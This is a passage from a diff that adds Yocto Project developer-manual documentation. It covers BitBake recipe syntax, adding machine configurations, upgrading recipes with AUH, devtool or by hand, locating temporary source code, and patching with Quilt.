+or ordering recipe components in an erratic way, are widely seen as poor
+style.
+
+Recipe Syntax
+-------------
+
+Understanding recipe file syntax is important for writing recipes. The
+following list overviews the basic items that make up a BitBake recipe
+file. For more complete BitBake syntax descriptions, see the
+":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`"
+chapter of the BitBake User Manual.
+
+- *Variable Assignments and Manipulations:* Variable assignments allow
+ a value to be assigned to a variable. The assignment can be static
+ text or might include the contents of other variables. In addition to
+ the assignment, appending and prepending operations are also
+ supported.
+
+ The following example shows some of the ways you can use variables in
+ recipes:
+ ::
+
+ S = "${WORKDIR}/postfix-${PV}"
+ CFLAGS += "-DNO_ASM"
+ SRC_URI_append = " file://fixup.patch"
+
+- *Functions:* Functions provide a series of actions to be performed.
+ You usually use functions to override the default implementation of a
+ task function or to complement a default function (i.e. append or
+ prepend to an existing function). Standard functions use ``sh`` shell
+ syntax, although access to OpenEmbedded variables and internal
+ methods are also available.
+
+ The following is an example function from the ``sed`` recipe:
+ ::
+
+ do_install () {
+ autotools_do_install
+ install -d ${D}${base_bindir}
+ mv ${D}${bindir}/sed ${D}${base_bindir}/sed
+ rmdir ${D}${bindir}/
+ }
+
+ It is
+ also possible to implement new functions that are called between
+ existing tasks as long as the new functions are not replacing or
+ complementing the default functions. You can implement functions in
+ Python instead of shell. Both of these options are not seen in the
+ majority of recipes.
+
+- *Keywords:* BitBake recipes use only a few keywords. You use keywords
+ to include common functions (``inherit``), load parts of a recipe
+ from other files (``include`` and ``require``) and export variables
+ to the environment (``export``).
+
+ The following example shows the use of some of these keywords:
+ ::
+
+ export POSTCONF = "${STAGING_BINDIR}/postconf"
+ inherit autoconf
+ require otherfile.inc
+
+- *Comments (#):* Any lines that begin with the hash character (``#``)
+ are treated as comment lines and are ignored:
+ ::
+
+ # This is a comment
+
+This next list summarizes the most important and most commonly used
+parts of the recipe syntax. For more information on these parts of the
+syntax, you can reference the
+:doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata` chapter
+in the BitBake User Manual.
+
+- *Line Continuation (\\):* Use the backward slash (``\``) character to
+ split a statement over multiple lines. Place the slash character at
+ the end of the line that is to be continued on the next line:
+ ::
+
+ VAR = "A really long \
+ line"
+
+ .. note::
+
+ You cannot have any characters including spaces or tabs after the
+ slash character.
+
+- *Using Variables (${VARNAME}):* Use the ``${VARNAME}`` syntax to
+ access the contents of a variable:
+ ::
+
+ SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/zlib-${PV}.tar.gz"
+
+ .. note::
+
+ It is important to understand that the value of a variable
+ expressed in this form does not get substituted automatically. The
+ expansion of these expressions happens on-demand later (e.g.
+ usually when a function that makes reference to the variable
+ executes). This behavior ensures that the values are most
+ appropriate for the context in which they are finally used. On the
+ rare occasion that you do need the variable expression to be
+ expanded immediately, you can use the
+ :=
+ operator instead of
+ =
+ when you make the assignment, but this is not generally needed.
+
+- *Quote All Assignments ("value"):* Use double quotes around values in
+ all variable assignments (e.g. ``"value"``). Following is an example:
+ ::
+
+ VAR1 = "${OTHERVAR}"
+ VAR2 = "The version is ${PV}"
+
+- *Conditional Assignment (?=):* Conditional assignment is used to
+ assign a value to a variable, but only when the variable is currently
+ unset. Use the question mark followed by the equal sign (``?=``) to
+ make a "soft" assignment used for conditional assignment. Typically,
+ "soft" assignments are used in the ``local.conf`` file for variables
+ that are allowed to come through from the external environment.
+
+ Here is an example where ``VAR1`` is set to "New value" if it is
+ currently empty. However, if ``VAR1`` has already been set, it
+ remains unchanged:
+ ::
+
+ VAR1 ?= "New value"
+
+ In this next example, ``VAR1`` is left with the value "Original value":
+ ::
+
+ VAR1 = "Original value"
+ VAR1 ?= "New value"
+
+- *Appending (+=):* Use the plus character followed by the equals sign
+ (``+=``) to append values to existing variables.
+
+ .. note::
+
+ This operator adds a space between the existing content of the
+ variable and the new content.
+
+ Here is an example:
+ ::
+
+ SRC_URI += "file://fix-makefile.patch"
+
+- *Prepending (=+):* Use the equals sign followed by the plus character
+ (``=+``) to prepend values to existing variables.
+
+ .. note::
+
+ This operator adds a space between the new content and the
+ existing content of the variable.
+
+ Here is an example:
+ ::
+
+ VAR =+ "Starts"
+
+- *Appending (_append):* Use the ``_append`` operator to append values
+ to existing variables. This operator does not add any additional
+ space. Also, the operator is applied after all the ``+=``, and ``=+``
+ operators have been applied and after all ``=`` assignments have
+ occurred.
+
+ The following example shows the space being explicitly added to the
+ start to ensure the appended value is not merged with the existing
+ value:
+ ::
+
+ SRC_URI_append = " file://fix-makefile.patch"
+
+ You can also use
+ the ``_append`` operator with overrides, which results in the actions
+ only being performed for the specified target or machine:
+ ::
+
+ SRC_URI_append_sh4 = " file://fix-makefile.patch"
+
+- *Prepending (_prepend):* Use the ``_prepend`` operator to prepend
+ values to existing variables. This operator does not add any
+ additional space. Also, the operator is applied after all the ``+=``,
+ and ``=+`` operators have been applied and after all ``=``
+ assignments have occurred.
+
+ The following example shows the space being explicitly added to the
+ end to ensure the prepended value is not merged with the existing
+ value:
+ ::
+
+ CFLAGS_prepend = "-I${S}/myincludes "
+
+ You can also use the
+ ``_prepend`` operator with overrides, which results in the actions
+ only being performed for the specified target or machine:
+ ::
+
+ CFLAGS_prepend_sh4 = "-I${S}/myincludes "
+
+- *Overrides:* You can use overrides to set a value conditionally,
+ typically based on how the recipe is being built. For example, to set
+ the :term:`KBRANCH` variable's
+ value to "standard/base" for any target
+ :term:`MACHINE`, except for
+ qemuarm where it should be set to "standard/arm-versatile-926ejs",
+ you would do the following:
+ ::
+
+ KBRANCH = "standard/base"
+ KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
+
+ Overrides are also used to separate
+ alternate values of a variable in other situations. For example, when
+ setting variables such as
+ :term:`FILES` and
+ :term:`RDEPENDS` that are
+ specific to individual packages produced by a recipe, you should
+ always use an override that specifies the name of the package.
+
+- *Indentation:* Use spaces for indentation rather than tabs. For
+ shell functions, both currently work. However, it is a policy
+ decision of the Yocto Project to use tabs in shell functions. Realize
+ that some layers have a policy to use spaces for all indentation.
+
+- *Using Python for Complex Operations:* For more advanced processing,
+ it is possible to use Python code during variable assignments (e.g.
+ search and replacement on a variable).
+
+ You indicate Python code using the ``${@python_code}`` syntax for the
+ variable assignment:
+ ::
+
+ SRC_URI = "ftp://ftp.info-zip.org/pub/infozip/src/zip${@d.getVar('PV',1).replace('.', '')}.tgz
+
+- *Shell Function Syntax:* Write shell functions as if you were writing
+ a shell script when you describe a list of actions to take. You
+ should ensure that your script works with a generic ``sh`` and that
+ it does not require any ``bash`` or other shell-specific
+ functionality. The same considerations apply to various system
+ utilities (e.g. ``sed``, ``grep``, ``awk``, and so forth) that you
+ might wish to use. If in doubt, you should check with multiple
+ implementations - including those from BusyBox.
+
+.. _platdev-newmachine:
+
+Adding a New Machine
+====================
+
+Adding a new machine to the Yocto Project is a straightforward process.
+This section describes how to add machines that are similar to those
+that the Yocto Project already supports.
+
+.. note::
+
+ Although well within the capabilities of the Yocto Project, adding a
+ totally new architecture might require changes to ``gcc``/``glibc``
+ and to the site information, which is beyond the scope of this
+ manual.
+
+For a complete example that shows how to add a new machine, see the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section in the Yocto Project Board Support Package (BSP) Developer's
+Guide.
+
+.. _platdev-newmachine-conffile:
+
+Adding the Machine Configuration File
+-------------------------------------
+
+To add a new machine, you need to add a new machine configuration file
+to the layer's ``conf/machine`` directory. This configuration file
+provides details about the device you are adding.
+
+The OpenEmbedded build system uses the root name of the machine
+configuration file to reference the new machine. For example, given a
+machine configuration file named ``crownbay.conf``, the build system
+recognizes the machine as "crownbay".
+
+The most important variables you must set in your machine configuration
+file or include from a lower-level configuration file are as follows:
+
+- ``TARGET_ARCH`` (e.g. "arm")
+
+- ``PREFERRED_PROVIDER_virtual/kernel``
+
+- ``MACHINE_FEATURES`` (e.g. "apm screen wifi")
+
+You might also need these variables:
+
+- ``SERIAL_CONSOLES`` (e.g. "115200;ttyS0 115200;ttyS1")
+
+- ``KERNEL_IMAGETYPE`` (e.g. "zImage")
+
+- ``IMAGE_FSTYPES`` (e.g. "tar.gz jffs2")
+
+You can find full details on these variables in the reference section.
+You can leverage existing machine ``.conf`` files from
+``meta-yocto-bsp/conf/machine/``.
+
+.. _platdev-newmachine-kernel:
+
+Adding a Kernel for the Machine
+-------------------------------
+
+The OpenEmbedded build system needs to be able to build a kernel for the
+machine. You need to either create a new kernel recipe for this machine,
+or extend an existing kernel recipe. You can find several kernel recipe
+examples in the Source Directory at ``meta/recipes-kernel/linux`` that
+you can use as references.
+
+If you are creating a new kernel recipe, normal recipe-writing rules
+apply for setting up a ``SRC_URI``. Thus, you need to specify any
+necessary patches and set ``S`` to point at the source code. You need to
+create a ``do_configure`` task that configures the unpacked kernel with
+a ``defconfig`` file. You can do this by using a ``make defconfig``
+command or, more commonly, by copying in a suitable ``defconfig`` file
+and then running ``make oldconfig``. By making use of ``inherit kernel``
+and potentially some of the ``linux-*.inc`` files, most other
+functionality is centralized and the defaults of the class normally work
+well.
+
+If you are extending an existing kernel recipe, it is usually a matter
+of adding a suitable ``defconfig`` file. The file needs to be added into
+a location similar to ``defconfig`` files used for other machines in a
+given kernel recipe. A possible way to do this is by listing the file in
+the ``SRC_URI`` and adding the machine to the expression in
+``COMPATIBLE_MACHINE``:
+::
+
+ COMPATIBLE_MACHINE = '(qemux86|qemumips)'
+
+For more information on ``defconfig`` files, see the
+":ref:`kernel-dev/kernel-dev-common:changing the configuration`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _platdev-newmachine-formfactor:
+
+Adding a Formfactor Configuration File
+--------------------------------------
+
+A formfactor configuration file provides information about the target
+hardware for which the image is being built and information that the
+build system cannot obtain from other sources such as the kernel. Some
+examples of information contained in a formfactor configuration file
+include framebuffer orientation, whether or not the system has a
+keyboard, the positioning of the keyboard in relation to the screen, and
+the screen resolution.
+
+The build system uses reasonable defaults in most cases. However, if
+customization is necessary, you need to create a ``machconfig`` file in
+the ``meta/recipes-bsp/formfactor/files`` directory. This directory
+contains directories for specific machines such as ``qemuarm`` and
+``qemux86``. For information about the settings available and the
+defaults, see the ``meta/recipes-bsp/formfactor/files/config`` file
+found in the same area.
+
+Following is an example for "qemuarm" machine:
+::
+
+ HAVE_TOUCHSCREEN=1
+ HAVE_KEYBOARD=1
+ DISPLAY_CAN_ROTATE=0
+ DISPLAY_ORIENTATION=0
+ #DISPLAY_WIDTH_PIXELS=640
+ #DISPLAY_HEIGHT_PIXELS=480
+ #DISPLAY_BPP=16
+ DISPLAY_DPI=150
+ DISPLAY_SUBPIXEL_ORDER=vrgb
+
+.. _gs-upgrading-recipes:
+
+Upgrading Recipes
+=================
+
+Over time, upstream developers publish new versions for software built
+by layer recipes. It is recommended to keep recipes up-to-date with
+upstream version releases.
+
+While several methods exist that allow you upgrade a recipe, you might
+consider checking on the upgrade status of a recipe first. You can do so
+using the ``devtool check-upgrade-status`` command. See the
+":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`"
+section in the Yocto Project Reference Manual for more information.
+
+The remainder of this section describes three ways you can upgrade a
+recipe. You can use the Automated Upgrade Helper (AUH) to set up
+automatic version upgrades. Alternatively, you can use
+``devtool upgrade`` to set up semi-automatic version upgrades. Finally,
+you can manually upgrade a recipe by editing the recipe itself.
+
+.. _gs-using-the-auto-upgrade-helper:
+
+Using the Auto Upgrade Helper (AUH)
+-----------------------------------
+
+The AUH utility works in conjunction with the OpenEmbedded build system
+in order to automatically generate upgrades for recipes based on new
+versions being published upstream. Use AUH when you want to create a
+service that performs the upgrades automatically and optionally sends
+you an email with the results.
+
+AUH allows you to update several recipes with a single use. You can also
+optionally perform build and integration tests using images with the
+results saved to your hard drive and emails of results optionally sent
+to recipe maintainers. Finally, AUH creates Git commits with appropriate
+commit messages in the layer's tree for the changes made to recipes.
+
+.. note::
+
+ Conditions do exist when you should not use AUH to upgrade recipes
+ and you should instead use either ``devtool upgrade`` or upgrade your
+ recipes manually:
+
+ - When AUH cannot complete the upgrade sequence. This situation
+ usually results because custom patches carried by the recipe
+ cannot be automatically rebased to the new version. In this case,
+ ``devtool upgrade`` allows you to manually resolve conflicts.
+
+ - When for any reason you want fuller control over the upgrade
+ process. For example, when you want special arrangements for
+ testing.
+
+The following steps describe how to set up the AUH utility:
+
+1. *Be Sure the Development Host is Set Up:* You need to be sure that
+ your development host is set up to use the Yocto Project. For
+ information on how to set up your host, see the
+ ":ref:`dev-preparing-the-build-host`" section.
+
+2. *Make Sure Git is Configured:* The AUH utility requires Git to be
+ configured because AUH uses Git to save upgrades. Thus, you must have
+ Git user and email configured. The following command shows your
+ configurations:
+ ::
+
+ $ git config --list
+
+ If you do not have the user and
+ email configured, you can use the following commands to do so:
+ ::
+
+ $ git config --global user.name some_name
+ $ git config --global user.email username@domain.com
+
+3. *Clone the AUH Repository:* To use AUH, you must clone the repository
+ onto your development host. The following command uses Git to create
+ a local copy of the repository on your system:
+ ::
+
+ $ git clone git://git.yoctoproject.org/auto-upgrade-helper
+ Cloning into 'auto-upgrade-helper'... remote: Counting objects: 768, done.
+ remote: Compressing objects: 100% (300/300), done.
+ remote: Total 768 (delta 499), reused 703 (delta 434)
+ Receiving objects: 100% (768/768), 191.47 KiB | 98.00 KiB/s, done.
+ Resolving deltas: 100% (499/499), done.
+ Checking connectivity... done.
+
+ AUH is not part of the :term:`OpenEmbedded-Core (OE-Core)` or
+ :term:`Poky` repositories.
+
+4. *Create a Dedicated Build Directory:* Run the
+ :ref:`structure-core-script`
+ script to create a fresh build directory that you use exclusively for
+ running the AUH utility:
+ ::
+
+ $ cd ~/poky
+ $ source oe-init-build-env your_AUH_build_directory
+
+ Re-using an existing build directory and its configurations is not
+ recommended as existing settings could cause AUH to fail or behave
+ undesirably.
+
+5. *Make Configurations in Your Local Configuration File:* Several
+ settings need to exist in the ``local.conf`` file in the build
+ directory you just created for AUH. Make these following
+ configurations:
+
+ - If you want to enable :ref:`Build
+ History <dev-manual/dev-manual-common-tasks:maintaining build output quality>`,
+ which is optional, you need the following lines in the
+ ``conf/local.conf`` file:
+ ::
+
+ INHERIT =+ "buildhistory"
+ BUILDHISTORY_COMMIT = "1"
+
+ With this configuration and a successful
+ upgrade, a build history "diff" file appears in the
+ ``upgrade-helper/work/recipe/buildhistory-diff.txt`` file found in
+ your build directory.
+
+ - If you want to enable testing through the
+ :ref:`testimage <ref-classes-testimage*>`
+ class, which is optional, you need to have the following set in
+ your ``conf/local.conf`` file:
+ ::
+
+ INHERIT += "testimage"
+
+ .. note::
+
+ If your distro does not enable by default ptest, which Poky
+ does, you need the following in your ``local.conf`` file:
+ ::
+
+ DISTRO_FEATURES_append = " ptest"
+
+
+6. *Optionally Start a vncserver:* If you are running in a server
+ without an X11 session, you need to start a vncserver:
+ ::
+
+ $ vncserver :1
+ $ export DISPLAY=:1
+
+7. *Create and Edit an AUH Configuration File:* You need to have the
+ ``upgrade-helper/upgrade-helper.conf`` configuration file in your
+ build directory. You can find a sample configuration file in the
+ :yocto_git:`AUH source repository </cgit/cgit.cgi/auto-upgrade-helper/tree/>`.
+
+ Read through the sample file and make configurations as needed. For
+ example, if you enabled build history in your ``local.conf`` as
+ described earlier, you must enable it in ``upgrade-helper.conf``.
+
+ Also, if you are using the default ``maintainers.inc`` file supplied
+ with Poky and located in ``meta-yocto`` and you do not set a
+ "maintainers_whitelist" or "global_maintainer_override" in the
+ ``upgrade-helper.conf`` configuration, and you specify "-e all" on
+ the AUH command-line, the utility automatically sends out emails to
+ all the default maintainers. Please avoid this.
+
+This next set of examples describes how to use the AUH:
+
+- *Upgrading a Specific Recipe:* To upgrade a specific recipe, use the
+ following form:
+ ::
+
+ $ upgrade-helper.py recipe_name
+
+ For example, this command upgrades the ``xmodmap`` recipe:
+ ::
+
+ $ upgrade-helper.py xmodmap
+
+- *Upgrading a Specific Recipe to a Particular Version:* To upgrade a
+ specific recipe to a particular version, use the following form:
+ ::
+
+ $ upgrade-helper.py recipe_name -t version
+
+ For example, this command upgrades the ``xmodmap`` recipe to version 1.2.3:
+ ::
+
+ $ upgrade-helper.py xmodmap -t 1.2.3
+
+- *Upgrading all Recipes to the Latest Versions and Suppressing Email
+ Notifications:* To upgrade all recipes to their most recent versions
+ and suppress the email notifications, use the following command:
+ ::
+
+ $ upgrade-helper.py all
+
+- *Upgrading all Recipes to the Latest Versions and Send Email
+ Notifications:* To upgrade all recipes to their most recent versions
+ and send email messages to maintainers for each attempted recipe as
+ well as a status email, use the following command:
+ ::
+
+ $ upgrade-helper.py -e all
+
+Once you have run the AUH utility, you can find the results in the AUH
+build directory:
+::
+
+ ${BUILDDIR}/upgrade-helper/timestamp
+
+The AUH utility
+also creates recipe update commits from successful upgrade attempts in
+the layer tree.
+
+You can easily set up to run the AUH utility on a regular basis by using
+a cron job. See the
+:yocto_git:`weeklyjob.sh </cgit/cgit.cgi/auto-upgrade-helper/tree/weeklyjob.sh>`
+file distributed with the utility for an example.
+
+.. _gs-using-devtool-upgrade:
+
+Using ``devtool upgrade``
+-------------------------
+
+As mentioned earlier, an alternative method for upgrading recipes to
+newer versions is to use
+:doc:`devtool upgrade <../ref-manual/ref-devtool-reference>`.
+You can read about ``devtool upgrade`` in general in the
+":ref:`sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) Manual.
+
+To see all the command-line options available with ``devtool upgrade``,
+use the following help command:
+::
+
+ $ devtool upgrade -h
+
+If you want to find out what version a recipe is currently at upstream
+without any attempt to upgrade your local version of the recipe, you can
+use the following command:
+::
+
+ $ devtool latest-version recipe_name
+
+As mentioned in the previous section describing AUH, ``devtool upgrade``
+works in a less-automated manner than AUH. Specifically,
+``devtool upgrade`` only works on a single recipe that you name on the
+command line, cannot perform build and integration testing using images,
+and does not automatically generate commits for changes in the source
+tree. Despite all these "limitations", ``devtool upgrade`` updates the
+recipe file to the new upstream version and attempts to rebase custom
+patches contained by the recipe as needed.
+
+.. note::
+
+ AUH uses much of ``devtool upgrade`` behind the scenes making AUH somewhat
+ of a "wrapper" application for ``devtool upgrade``.
+
+A typical scenario involves having used Git to clone an upstream
+repository that you use during build operations. Because you have built the
+recipe in the past, the layer is likely added to your
+configuration already. If for some reason, the layer is not added, you
+could add it easily using the
+":ref:`bitbake-layers <bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script>`"
+script. For example, suppose you use the ``nano.bb`` recipe from the
+``meta-oe`` layer in the ``meta-openembedded`` repository. For this
+example, assume that the layer has been cloned into following area:
+::
+
+ /home/scottrif/meta-openembedded
+
+The following command from your
+:term:`Build Directory` adds the layer to
+your build configuration (i.e. ``${BUILDDIR}/conf/bblayers.conf``):
+::
+
+ $ bitbake-layers add-layer /home/scottrif/meta-openembedded/meta-oe
+ NOTE: Starting bitbake server...
+ Parsing recipes: 100% |##########################################| Time: 0:00:55
+ Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
+ Removing 12 recipes from the x86_64 sysroot: 100% |##############| Time: 0:00:00
+ Removing 1 recipes from the x86_64_i586 sysroot: 100% |##########| Time: 0:00:00
+ Removing 5 recipes from the i586 sysroot: 100% |#################| Time: 0:00:00
+ Removing 5 recipes from the qemux86 sysroot: 100% |##############| Time: 0:00:00
+
+For this example, assume that the ``nano.bb`` recipe that
+is upstream has a 2.9.3 version number. However, the version in the
+local repository is 2.7.4. The following command from your build
+directory automatically upgrades the recipe for you:
+
+.. note::
+
+ Using the ``-V`` option is not necessary. Omitting the version number causes
+ ``devtool upgrade`` to upgrade the recipe to the most recent version.
+
+::
+
+ $ devtool upgrade nano -V 2.9.3
+ NOTE: Starting bitbake server...
+ NOTE: Creating workspace layer in /home/scottrif/poky/build/workspace
+ Parsing recipes: 100% |##########################################| Time: 0:00:46
+ Parsing of 1431 .bb files complete (0 cached, 1431 parsed). 2040 targets, 56 skipped, 0 masked, 0 errors.
+ NOTE: Extracting current version source...
+ NOTE: Resolving any missing task queue dependencies
+ .
+ .
+ .
+ NOTE: Executing SetScene Tasks
+ NOTE: Executing RunQueue Tasks
+ NOTE: Tasks Summary: Attempted 74 tasks of which 72 didn't need to be rerun and all succeeded.
+ Adding changed files: 100% |#####################################| Time: 0:00:00
+ NOTE: Upgraded source extracted to /home/scottrif/poky/build/workspace/sources/nano
+ NOTE: New recipe is /home/scottrif/poky/build/workspace/recipes/nano/nano_2.9.3.bb
+
+Continuing with this example, you can use ``devtool build`` to build the
+newly upgraded recipe:
+::
+
+ $ devtool build nano
+ NOTE: Starting bitbake server...
+ Loading cache: 100% |################################################################################################| Time: 0:00:01
+ Loaded 2040 entries from dependency cache.
+ Parsing recipes: 100% |##############################################################################################| Time: 0:00:00
+ Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
+ NOTE: Resolving any missing task queue dependencies
+ .
+ .
+ .
+ NOTE: Executing SetScene Tasks
+ NOTE: Executing RunQueue Tasks
+ NOTE: nano: compiling from external source tree /home/scottrif/poky/build/workspace/sources/nano
+ NOTE: Tasks Summary: Attempted 520 tasks of which 304 didn't need to be rerun and all succeeded.
+
+Within the ``devtool upgrade`` workflow, opportunity
+exists to deploy and test your rebuilt software. For this example,
+however, running ``devtool finish`` cleans up the workspace once the
+source in your workspace is clean. This usually means using Git to stage
+and submit commits for the changes generated by the upgrade process.
+
+Once the tree is clean, you can clean things up in this example with the
+following command from the ``${BUILDDIR}/workspace/sources/nano``
+directory:
+::
+
+ $ devtool finish nano meta-oe
+ NOTE: Starting bitbake server...
+ Loading cache: 100% |################################################################################################| Time: 0:00:00
+ Loaded 2040 entries from dependency cache.
+ Parsing recipes: 100% |##############################################################################################| Time: 0:00:01
+ Parsing of 1432 .bb files complete (1431 cached, 1 parsed). 2041 targets, 56 skipped, 0 masked, 0 errors.
+ NOTE: Adding new patch 0001-nano.bb-Stuff-I-changed-when-upgrading-nano.bb.patch
+ NOTE: Updating recipe nano_2.9.3.bb
+ NOTE: Removing file /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano/nano_2.7.4.bb
+ NOTE: Moving recipe file to /home/scottrif/meta-openembedded/meta-oe/recipes-support/nano
+ NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/nano as-is; if you no longer need it then please delete it manually
+
+
+Using the ``devtool finish`` command cleans up the workspace and creates a patch
+file based on your commits. The tool puts all patch files back into the
+source directory in a sub-directory named ``nano`` in this case.
+
+.. _dev-manually-upgrading-a-recipe:
+
+Manually Upgrading a Recipe
+---------------------------
+
+If for some reason you choose not to upgrade recipes using
+:ref:`gs-using-the-auto-upgrade-helper` or by :ref:`gs-using-devtool-upgrade`,
+you can manually edit the recipe files to upgrade the versions.
+
+.. note::
+
+ Manually updating multiple recipes scales poorly and involves many
+ steps. The recommendation to upgrade recipe versions is through AUH
+ or ``devtool upgrade``, both of which automate some steps and provide
+ guidance for others needed for the manual process.
+
+To manually upgrade recipe versions, follow these general steps:
+
+1. *Change the Version:* Rename the recipe such that the version (i.e.
+ the :term:`PV` part of the recipe name)
+ changes appropriately. If the version is not part of the recipe name,
+ change the value as it is set for ``PV`` within the recipe itself.
+
+2. *Update* ``SRCREV`` *if Needed*: If the source code your recipe builds
+ is fetched from Git or some other version control system, update
+ :term:`SRCREV` to point to the
+ commit hash that matches the new version.
+
+3. *Build the Software:* Try to build the recipe using BitBake. Typical
+ build failures include the following:
+
+ - License statements were updated for the new version. For this
+ case, you need to review any changes to the license and update the
+ values of :term:`LICENSE` and
+ :term:`LIC_FILES_CHKSUM`
+ as needed.
+
+ .. note::
+
+ License changes are often inconsequential. For example, the
+ license text's copyright year might have changed.
+
+ - Custom patches carried by the older version of the recipe might
+ fail to apply to the new version. For these cases, you need to
+ review the failures. Patches might not be necessary for the new
+ version of the software if the upgraded version has fixed those
+ issues. If a patch is necessary and failing, you need to rebase it
+ into the new version.
+
+4. *Optionally Attempt to Build for Several Architectures:* Once you
+ successfully build the new software for a given architecture, you
+ could test the build for other architectures by changing the
+ :term:`MACHINE` variable and
+ rebuilding the software. This optional step is especially important
+ if the recipe is to be released publicly.
+
+5. *Check the Upstream Change Log or Release Notes:* Checking both these
+ reveals if new features exist that could break
+ backwards-compatibility. If so, you need to take steps to mitigate or
+ eliminate that situation.
+
+6. *Optionally Create a Bootable Image and Test:* If you want, you can
+ test the new software by booting it onto actual hardware.
+
+7. *Create a Commit with the Change in the Layer Repository:* After all
+ builds work and any testing is successful, you can create commits for
+ any changes in the layer holding your upgraded recipe.
+
+.. _finding-the-temporary-source-code:
+
+Finding Temporary Source Code
+=============================
+
+You might find it helpful during development to modify the temporary
+source code used by recipes to build packages. For example, suppose you
+are developing a patch and you need to experiment a bit to figure out
+your solution. After you have initially built the package, you can
+iteratively tweak the source code, which is located in the
+:term:`Build Directory`, and then you can
+force a re-compile and quickly test your altered code. Once you settle
+on a solution, you can then preserve your changes in the form of
+patches.
+
+During a build, the unpacked temporary source code used by recipes to
+build packages is available in the Build Directory as defined by the
+:term:`S` variable. Below is the default
+value for the ``S`` variable as defined in the
+``meta/conf/bitbake.conf`` configuration file in the
+:term:`Source Directory`:
+::
+
+ S = "${WORKDIR}/${BP}"
+
+You should be aware that many recipes override the
+``S`` variable. For example, recipes that fetch their source from Git
+usually set ``S`` to ``${WORKDIR}/git``.
+
+.. note::
+
+ The :term:`BP` represents the base recipe name, which consists of the name
+ and version:
+ ::
+
+ BP = "${BPN}-${PV}"
+
+
+The path to the work directory for the recipe
+(:term:`WORKDIR`) is defined as
+follows:
+::
+
+ ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
+
+The actual directory depends on several things:
+
+- :term:`TMPDIR`: The top-level build
+ output directory.
+
+- :term:`MULTIMACH_TARGET_SYS`:
+ The target system identifier.
+
+- :term:`PN`: The recipe name.
+
+- :term:`EXTENDPE`: The epoch - (if
+ :term:`PE` is not specified, which is
+ usually the case for most recipes, then ``EXTENDPE`` is blank).
+
+- :term:`PV`: The recipe version.
+
+- :term:`PR`: The recipe revision.
+
+As an example, assume a Source Directory top-level folder named
+``poky``, a default Build Directory at ``poky/build``, and a
+``qemux86-poky-linux`` machine target system. Furthermore, suppose your
+recipe is named ``foo_1.3.0.bb``. In this case, the work directory the
+build system uses to build the package would be as follows:
+::
+
+ poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
+
+.. _using-a-quilt-workflow:
+
+Using Quilt in Your Workflow
+============================
+
+`Quilt <https://savannah.nongnu.org/projects/quilt>`__ is a powerful tool
+that allows you to capture source code changes without having a clean
+source tree. This section outlines the typical workflow you can use to
+modify source code, test changes, and then preserve the changes in the
+form of a patch all using Quilt.
+
+.. note::
+
+ With regard to preserving changes to source files, if you clean a
+ recipe or have ``rm_work`` enabled, the
+ :ref:`devtool workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow>`
+ as described in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual is a safer
+ development flow than the flow that uses Quilt.
+
+Follow these general steps:
+
+1. *Find the Source Code:* Temporary source code used by the
+ OpenEmbedded build system is kept in the
+ :term:`Build Directory`. See the
+ "`Finding Temporary Source
+ Code <#finding-the-temporary-source-code>`__" section to learn how to
+ locate the directory that has the temporary source code for a
+ particular package.
+
+2. *Change Your Working Directory:* You need to be in the directory that
+ has the temporary source code. That directory is defined by the
+ :term:`S` variable.
+
+3. *Create a New Patch:* Before modifying source code, you need to
+ create a new patch. To create a new patch file, use ``quilt new`` as
+ below:
+ ::
+
+ $ quilt new my_changes.patch
+
+4. *Notify Quilt and Add Files:* After creating the patch, you need to
+ notify Quilt about the files you plan to edit. You notify Quilt by
+ adding the files to the patch you just created:
+ ::
+
+ $ quilt add file1.c file2.c file3.c
+
+5. *Edit the Files:* Make your changes in the source code to the files
+ you added to the patch.
+
+6. *Test Your Changes:* Once you have modified the source code, the
+ easiest way to test your changes is by calling the ``do_compile``
+ task as shown in the following example:
+ ::
+
+ $ bitbake -c compile -f package
+
+ The ``-f`` or ``--force`` option forces the specified task to
+ execute. If you find problems with your code, you can just keep
+ editing and re-testing iteratively until things work as expected.
+
+ .. note::
+
+ All the modifications you make to the temporary source code disappear
+ once you run the ``do_clean`` or ``do_cleanall`` tasks using BitBake
+ (i.e. ``bitbake -c clean package`` and ``bitbake -c cleanall package``).
+ Modifications will also disappear if you use the ``rm_work`` feature as
+ described in the
+ ":ref:`dev-manual/dev-manual-common-tasks:conserving disk space during builds`"
+ section.
+
+7. *Generate the Patch:* Once your changes work as expected, you need to
+ use Quilt to generate the final patch that contains all your
+ modifications.
+ ::
+
+ $ quilt refresh
+
+ At this point, the
+ ``my_changes.patch`` file has all your edits made to the ``file1.c``,
+ ``file2.c``, and ``file3.c`` files.
+
+ You can find the resulting patch file in the ``patches/``
+ subdirectory of the source (``S``) directory.
+
+8. *Copy the Patch File:* For simplicity, copy the patch file into a
+ directory named ``files``, which you can create in the same directory
+ that holds the recipe (``.bb``) file or the append (``.bbappend``)
+ file. Placing the patch here guarantees that the OpenEmbedded build
+ system will find the patch. Next, add the patch into the ``SRC_URI``
+ of the recipe. Here is an example:
+ ::
+
+ SRC_URI += "file://my_changes.patch"
+
+.. _platdev-appdev-devshell:
+
+Using a Development Shell
+=========================
+
+When debugging certain commands or even when just editing packages,
+``devshell`` can be a useful tool. When you invoke ``devshell``, all
+tasks up to and including
+:ref:`ref-tasks-patch` are run for the
+specified target. Then, a new terminal is opened and you are placed in
+``${``\ :term:`S`\ ``}``, the source
